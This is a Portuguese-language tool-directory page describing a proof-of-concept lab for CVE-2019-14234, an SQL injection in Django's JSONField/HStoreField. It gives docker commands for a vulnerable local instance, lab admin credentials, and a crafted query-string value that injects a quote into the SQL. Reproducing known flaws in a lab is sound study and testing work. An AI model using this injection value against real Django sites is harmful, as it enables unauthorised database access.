Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/malvika-thakur/cve-2019-14234
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHubmalvika-thakur/cve-2019-14234

CVE-2019-14234

POC-Django Vulnerabilidade de Injeção SQL em JSONField/HStoreField (CVE-2019-14234)

Ver Repositório
22há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

POC-Django Exploit de Vulnerabilidade de Injeção SQL em JSONField/HStoreField (CVE-2019-14234)

O Django lançou uma atualização de segurança em 1º de agosto de 2019, que corrige uma vulnerabilidade de injeção SQL nos dois campos de modelo JSONField e HStoreField.

Link de referência:

https://www.djangoproject.com/weblog/2019/aug/01/security-releases/ https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html

A vulnerabilidade exige que o desenvolvedor use JSONField/HStoreField; além disso, o nome do campo do queryset pode ser controlado. O aplicativo integrado do Django, Django-Admin, é afetado, o que nos oferece uma maneira fácil de reproduzir a vulnerabilidade.

Iniciar Aplicação Vulnerável

Compile e inicie um Django 2.2.3 vulnerável executando o seguinte comando:

root@kitploit:~
docker compose build
docker compose up -d

Após o ambiente ser iniciado, você pode ver a página inicial do Django em http://your-ip:8000.

Reprodução da Vulnerabilidade

Primeiro, faça login no Django-Admin http://your-ip:8000/admin/ com o nome de usuário e a senha .

admin
a123123123

Em seguida, acesse a visualização de lista http://your-ip:8000/admin/vuln/collection/ do modelo Collection:

Adicione detail__a'b=123 ao parâmetro GET, onde detail é o JSONField:

http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123

Você pode ver que a aspa simples foi injetada com sucesso, e a instrução SQL relata um erro:

Baixar ferramenta